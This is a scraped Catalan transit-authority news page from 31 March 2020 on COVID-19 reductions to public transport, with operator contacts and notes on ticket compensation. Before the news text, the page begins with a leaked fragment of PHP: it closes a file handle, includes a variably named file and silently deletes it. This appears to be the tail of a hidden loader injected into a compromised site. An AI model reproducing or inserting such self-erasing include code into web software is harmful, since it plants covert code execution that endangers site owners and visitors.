");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Afectacions al transport públic pel #Coronavirus #COVID19
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Afectacions al transport públic pel #Coronavirus #COVID19 (31/03/2020)

L'oferta de transport públic s’ha reajustat i osciŀla entre el 33 i el 67% de l’habitual, segons operador de transport i franja horària.

Els serveis nocturns (entre 23.00h i les 6.00) poden haver experimentat una reducció superior a la del servei diürn i fins i tot, en cas de tenir demanda gairebé nuŀla, haver estat suprimits.

Per a major informació consulta el teu operador de transport:

o EMT de Tarragona – 977543244 - emtanemambtu.cat/
o Reus Transport – 977300006 - www.reustransport.cat/
o Autocars del Penedès – 977660821 - autocarsdelpenedes.com/
o Autocars Poch – 977660240 - www.moventis.es/es/Marcas/poch
o Cintoi Bus – 938937511 - www.monbus.cat/
o Empresa Plana - 977 553 680 - www.empresaplana.cat/
o HIFE – 902119814 i 902119844 - www.hife.es/
o Hispano Igualadina – 900825029, 902292900, 977770698 i 933397329 - www.igualadina.com/
o Transports Públics del Priorat i Domènech – 977831871 - autocarsdomenech.cat/
o RENFE – 912320320 - www.renfe.com/

Compensació dels títols
En acabar l’Estat d’Alarma l’ATM establirà la compensació dels títols que no s'hagin pogut utilitzar durant aquest període d'emergència causat pel Coronavirus COVID19.

Soŀlicitud T-12
Si havies soŀlicitat una T-12, el seu enviament queda ajornat i es reprendrà quan acabi el confinament pel Coronavirus COVID19.

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona